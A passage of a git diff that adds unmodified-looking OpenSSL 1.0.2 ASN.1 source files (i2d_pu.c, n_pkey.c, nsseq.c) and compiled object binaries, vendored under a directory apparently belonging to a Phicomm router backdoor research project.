+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/bn.h>
+#include <openssl/evp.h>
+#include <openssl/objects.h>
+#ifndef OPENSSL_NO_RSA
+# include <openssl/rsa.h>
+#endif
+#ifndef OPENSSL_NO_DSA
+# include <openssl/dsa.h>
+#endif
+#ifndef OPENSSL_NO_EC
+# include <openssl/ec.h>
+#endif
+
+int i2d_PublicKey(EVP_PKEY *a, unsigned char **pp)
+{
+    switch (a->type) {
+#ifndef OPENSSL_NO_RSA
+    case EVP_PKEY_RSA:
+        return (i2d_RSAPublicKey(a->pkey.rsa, pp));
+#endif
+#ifndef OPENSSL_NO_DSA
+    case EVP_PKEY_DSA:
+        return (i2d_DSAPublicKey(a->pkey.dsa, pp));
+#endif
+#ifndef OPENSSL_NO_EC
+    case EVP_PKEY_EC:
+        return (i2o_ECPublicKey(a->pkey.ec, pp));
+#endif
+    default:
+        ASN1err(ASN1_F_I2D_PUBLICKEY, ASN1_R_UNSUPPORTED_PUBLIC_KEY_TYPE);
+        return (-1);
+    }
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/i2d_pu.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/i2d_pu.o
new file mode 100644
index 0000000000000000000000000000000000000000..fa468303619d0af970915be390a019ea773b7add
GIT binary patch
literal 1728
zcmbtT&ubGw6n@*(rfS+o@gP)W4<Z%qkko=$RFc*tMWc;rdnvTbCS7eYzu3$|<H0I9
z_TnEQc=6D)2Q7Hfn}3EL#Y+$&zBfCQOg5W~K6rWG`{sS~W@lawGx_Y8VSq9N?m<6O
zEWoQsAEyLN!4$;c*UaVLN6~g?f?sKOIG-zgc!#T*<Vo`D$G3<+P2taX612Z`w?3~P
z9hyHV>jB8EtSp&xn<cNtJ@YoZ$rAI)Tb@XhFBcLlv3Sj=Ne1KSar9H@xyPF@25>^0
zI^G4uWX6jk7zc4<HWr<HgC9ivC9wjKrubw!zCArDnc+ZpFb+Sv!z<J)?1qR}rx;X4
z#Hj~4$|5i^ObR|af)77$MBK)p<P4_gwR4JZM(!dy-Cxic5@GzE5&WYOJnS#*S`Ckt
z1t@r>%6|Ew(*i4(Ut3P+t+i}+J+onLq?hv<3o^wb7IVvS-MT9j#r1SwM0?%W34p8e
z;PmEa(f@RPTh#cN#^2R=8bwuaN*?EjW~gth*{X881gyzjKkg~yIu)C7=YRv-wYd$f
z)NBGP*Q-^hhFq=A9fmVG-{f}rxy+x{Jl1gQ4aemzU}6Vn&wA?GRj1$cKah!9n#SNH
zrH~_2@9t-Qt-=&%(djNz=(-)tOIej9%@g%e6G(GJM(;s<aPnW%Vu(?#ZZ|NYJ^xjo
zL@n)^K-W$6zpj&rReu$iG)^yluO}K-Iz>G|K>yZ(8N&Qn7ML=spzcrQB?Po*Q2$L9
z1ive&-^RMI_v^?F)jQGqkyhyyAJ$v6mLFP>k^XC^L-fQ2-;VSJ*?)%;&E$4H<{Y9h
NeO!{2UZoF$`oATEl|BFf

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/n_pkey.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/n_pkey.c
new file mode 100644
index 0000000..d5a5514
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/n_pkey.c
@@ -0,0 +1,345 @@
+/* crypto/asn1/n_pkey.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#ifndef OPENSSL_NO_RSA
+# include <openssl/rsa.h>
+# include <openssl/objects.h>
+# include <openssl/asn1t.h>
+# include <openssl/asn1_mac.h>
+# include <openssl/evp.h>
+# include <openssl/x509.h>
+
+# ifndef OPENSSL_NO_RC4
+
+typedef struct netscape_pkey_st {
+    long version;
+    X509_ALGOR *algor;
+    ASN1_OCTET_STRING *private_key;
+} NETSCAPE_PKEY;
+
+typedef struct netscape_encrypted_pkey_st {
+    ASN1_OCTET_STRING *os;
+    /*
+     * This is the same structure as DigestInfo so use it: although this
+     * isn't really anything to do with digests.
+     */
+    X509_SIG *enckey;
+} NETSCAPE_ENCRYPTED_PKEY;
+
+
+ASN1_BROKEN_SEQUENCE(NETSCAPE_ENCRYPTED_PKEY) = {
+        ASN1_SIMPLE(NETSCAPE_ENCRYPTED_PKEY, os, ASN1_OCTET_STRING),
+        ASN1_SIMPLE(NETSCAPE_ENCRYPTED_PKEY, enckey, X509_SIG)
+} ASN1_BROKEN_SEQUENCE_END(NETSCAPE_ENCRYPTED_PKEY)
+
+DECLARE_ASN1_FUNCTIONS_const(NETSCAPE_ENCRYPTED_PKEY)
+DECLARE_ASN1_ENCODE_FUNCTIONS_const(NETSCAPE_ENCRYPTED_PKEY,NETSCAPE_ENCRYPTED_PKEY)
+IMPLEMENT_ASN1_FUNCTIONS_const(NETSCAPE_ENCRYPTED_PKEY)
+
+ASN1_SEQUENCE(NETSCAPE_PKEY) = {
+        ASN1_SIMPLE(NETSCAPE_PKEY, version, LONG),
+        ASN1_SIMPLE(NETSCAPE_PKEY, algor, X509_ALGOR),
+        ASN1_SIMPLE(NETSCAPE_PKEY, private_key, ASN1_OCTET_STRING)
+} ASN1_SEQUENCE_END(NETSCAPE_PKEY)
+
+DECLARE_ASN1_FUNCTIONS_const(NETSCAPE_PKEY)
+DECLARE_ASN1_ENCODE_FUNCTIONS_const(NETSCAPE_PKEY,NETSCAPE_PKEY)
+IMPLEMENT_ASN1_FUNCTIONS_const(NETSCAPE_PKEY)
+
+static RSA *d2i_RSA_NET_2(RSA **a, ASN1_OCTET_STRING *os,
+                          int (*cb) (char *buf, int len, const char *prompt,
+                                     int verify), int sgckey);
+
+int i2d_Netscape_RSA(const RSA *a, unsigned char **pp,
+                     int (*cb) (char *buf, int len, const char *prompt,
+                                int verify))
+{
+    return i2d_RSA_NET(a, pp, cb, 0);
+}
+
+int i2d_RSA_NET(const RSA *a, unsigned char **pp,
+                int (*cb) (char *buf, int len, const char *prompt,
+                           int verify), int sgckey)
+{
+    int i, j, ret = 0;
+    int rsalen, pkeylen, olen;
+    NETSCAPE_PKEY *pkey = NULL;
+    NETSCAPE_ENCRYPTED_PKEY *enckey = NULL;
+    unsigned char buf[256], *zz;
+    unsigned char key[EVP_MAX_KEY_LENGTH];
+    EVP_CIPHER_CTX ctx;
+    EVP_CIPHER_CTX_init(&ctx);
+
+    if (a == NULL)
+        return (0);
+
+    if ((pkey = NETSCAPE_PKEY_new()) == NULL)
+        goto err;
+    if ((enckey = NETSCAPE_ENCRYPTED_PKEY_new()) == NULL)
+        goto err;
+    pkey->version = 0;
+
+    pkey->algor->algorithm = OBJ_nid2obj(NID_rsaEncryption);
+    if ((pkey->algor->parameter = ASN1_TYPE_new()) == NULL)
+        goto err;
+    pkey->algor->parameter->type = V_ASN1_NULL;
+
+    rsalen = i2d_RSAPrivateKey(a, NULL);
+
+    /*
+     * Fake some octet strings just for the initial length calculation.
+     */
+
+    pkey->private_key->length = rsalen;
+
+    pkeylen = i2d_NETSCAPE_PKEY(pkey, NULL);
+
+    enckey->enckey->digest->length = pkeylen;
+
+    enckey->os->length = 11;    /* "private-key" */
+
+    enckey->enckey->algor->algorithm = OBJ_nid2obj(NID_rc4);
+    if ((enckey->enckey->algor->parameter = ASN1_TYPE_new()) == NULL)
+        goto err;
+    enckey->enckey->algor->parameter->type = V_ASN1_NULL;
+
+    if (pp == NULL) {
+        olen = i2d_NETSCAPE_ENCRYPTED_PKEY(enckey, NULL);
+        NETSCAPE_PKEY_free(pkey);
+        NETSCAPE_ENCRYPTED_PKEY_free(enckey);
+        return olen;
+    }
+
+    /* Since its RC4 encrypted length is actual length */
+    if ((zz = (unsigned char *)OPENSSL_malloc(rsalen)) == NULL) {
+        ASN1err(ASN1_F_I2D_RSA_NET, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    pkey->private_key->data = zz;
+    /* Write out private key encoding */
+    i2d_RSAPrivateKey(a, &zz);
+
+    if ((zz = OPENSSL_malloc(pkeylen)) == NULL) {
+        ASN1err(ASN1_F_I2D_RSA_NET, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    if (!ASN1_STRING_set(enckey->os, "private-key", -1)) {
+        ASN1err(ASN1_F_I2D_RSA_NET, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    enckey->enckey->digest->data = zz;
+    i2d_NETSCAPE_PKEY(pkey, &zz);
+
+    /* Wipe the private key encoding */
+    OPENSSL_cleanse(pkey->private_key->data, rsalen);
+
+    if (cb == NULL)
+        cb = EVP_read_pw_string;
+    i = cb((char *)buf, 256, "Enter Private Key password:", 1);
+    if (i != 0) {
+        ASN1err(ASN1_F_I2D_RSA_NET, ASN1_R_BAD_PASSWORD_READ);
+        goto err;
+    }
+    i = strlen((char *)buf);
+    /* If the key is used for SGC the algorithm is modified a little. */
+    if (sgckey) {
+        if (!EVP_Digest(buf, i, buf, NULL, EVP_md5(), NULL))
+            goto err;
+        memcpy(buf + 16, "SGCKEYSALT", 10);
+        i = 26;
+    }
+
+    if (!EVP_BytesToKey(EVP_rc4(), EVP_md5(), NULL, buf, i, 1, key, NULL))
+        goto err;
+    OPENSSL_cleanse(buf, 256);
+
+    /* Encrypt private key in place */
+    zz = enckey->enckey->digest->data;
+    if (!EVP_EncryptInit_ex(&ctx, EVP_rc4(), NULL, key, NULL))
+        goto err;
+    if (!EVP_EncryptUpdate(&ctx, zz, &i, zz, pkeylen))
+        goto err;
+    if (!EVP_EncryptFinal_ex(&ctx, zz + i, &j))
+        goto err;
+
+    ret = i2d_NETSCAPE_ENCRYPTED_PKEY(enckey, pp);
+ err:
+    EVP_CIPHER_CTX_cleanup(&ctx);
+    NETSCAPE_ENCRYPTED_PKEY_free(enckey);
+    NETSCAPE_PKEY_free(pkey);
+    return (ret);
+}
+
+RSA *d2i_Netscape_RSA(RSA **a, const unsigned char **pp, long length,
+                      int (*cb) (char *buf, int len, const char *prompt,
+                                 int verify))
+{
+    return d2i_RSA_NET(a, pp, length, cb, 0);
+}
+
+RSA *d2i_RSA_NET(RSA **a, const unsigned char **pp, long length,
+                 int (*cb) (char *buf, int len, const char *prompt,
+                            int verify), int sgckey)
+{
+    RSA *ret = NULL;
+    const unsigned char *p;
+    NETSCAPE_ENCRYPTED_PKEY *enckey = NULL;
+
+    p = *pp;
+
+    enckey = d2i_NETSCAPE_ENCRYPTED_PKEY(NULL, &p, length);
+    if (!enckey) {
+        ASN1err(ASN1_F_D2I_RSA_NET, ASN1_R_DECODING_ERROR);
+        return NULL;
+    }
+
+    if ((enckey->os->length != 11) || (strncmp("private-key",
+                                               (char *)enckey->os->data,
+                                               11) != 0)) {
+        ASN1err(ASN1_F_D2I_RSA_NET, ASN1_R_PRIVATE_KEY_HEADER_MISSING);
+        NETSCAPE_ENCRYPTED_PKEY_free(enckey);
+        return NULL;
+    }
+    if (OBJ_obj2nid(enckey->enckey->algor->algorithm) != NID_rc4) {
+        ASN1err(ASN1_F_D2I_RSA_NET, ASN1_R_UNSUPPORTED_ENCRYPTION_ALGORITHM);
+        goto err;
+    }
+    if (cb == NULL)
+        cb = EVP_read_pw_string;
+    if ((ret = d2i_RSA_NET_2(a, enckey->enckey->digest, cb, sgckey)) == NULL)
+        goto err;
+
+    *pp = p;
+
+ err:
+    NETSCAPE_ENCRYPTED_PKEY_free(enckey);
+    return ret;
+
+}
+
+static RSA *d2i_RSA_NET_2(RSA **a, ASN1_OCTET_STRING *os,
+                          int (*cb) (char *buf, int len, const char *prompt,
+                                     int verify), int sgckey)
+{
+    NETSCAPE_PKEY *pkey = NULL;
+    RSA *ret = NULL;
+    int i, j;
+    unsigned char buf[256];
+    const unsigned char *zz;
+    unsigned char key[EVP_MAX_KEY_LENGTH];
+    EVP_CIPHER_CTX ctx;
+    EVP_CIPHER_CTX_init(&ctx);
+
+    i = cb((char *)buf, 256, "Enter Private Key password:", 0);
+    if (i != 0) {
+        ASN1err(ASN1_F_D2I_RSA_NET_2, ASN1_R_BAD_PASSWORD_READ);
+        goto err;
+    }
+
+    i = strlen((char *)buf);
+    if (sgckey) {
+        if (!EVP_Digest(buf, i, buf, NULL, EVP_md5(), NULL))
+            goto err;
+        memcpy(buf + 16, "SGCKEYSALT", 10);
+        i = 26;
+    }
+
+    if (!EVP_BytesToKey(EVP_rc4(), EVP_md5(), NULL, buf, i, 1, key, NULL))
+        goto err;
+    OPENSSL_cleanse(buf, 256);
+
+    if (!EVP_DecryptInit_ex(&ctx, EVP_rc4(), NULL, key, NULL))
+        goto err;
+    if (!EVP_DecryptUpdate(&ctx, os->data, &i, os->data, os->length))
+        goto err;
+    if (!EVP_DecryptFinal_ex(&ctx, &(os->data[i]), &j))
+        goto err;
+    os->length = i + j;
+
+    zz = os->data;
+
+    if ((pkey = d2i_NETSCAPE_PKEY(NULL, &zz, os->length)) == NULL) {
+        ASN1err(ASN1_F_D2I_RSA_NET_2,
+                ASN1_R_UNABLE_TO_DECODE_RSA_PRIVATE_KEY);
+        goto err;
+    }
+
+    zz = pkey->private_key->data;
+    if ((ret = d2i_RSAPrivateKey(a, &zz, pkey->private_key->length)) == NULL) {
+        ASN1err(ASN1_F_D2I_RSA_NET_2, ASN1_R_UNABLE_TO_DECODE_RSA_KEY);
+        goto err;
+    }
+ err:
+    EVP_CIPHER_CTX_cleanup(&ctx);
+    NETSCAPE_PKEY_free(pkey);
+    return (ret);
+}
+
+# endif                         /* OPENSSL_NO_RC4 */
+
+#else                           /* !OPENSSL_NO_RSA */
+
+# if PEDANTIC
+static void *dummy = &dummy;
+# endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/n_pkey.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/n_pkey.o
new file mode 100644
index 0000000000000000000000000000000000000000..85d9aae5b645265a55aaca8f984486cbffafb3dd
GIT binary patch
literal 9944
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
W9e!7EiEzDbOL)e9Ewb{{t^Z$+!LNh>

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/nsseq.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/nsseq.c
new file mode 100644
index 0000000..f2f7cba
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/nsseq.c
@@ -0,0 +1,84 @@
+/* nsseq.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <openssl/asn1t.h>
+#include <openssl/x509.h>
+#include <openssl/objects.h>
+
+static int nsseq_cb(int operation, ASN1_VALUE **pval, const ASN1_ITEM *it,
+                    void *exarg)
+{
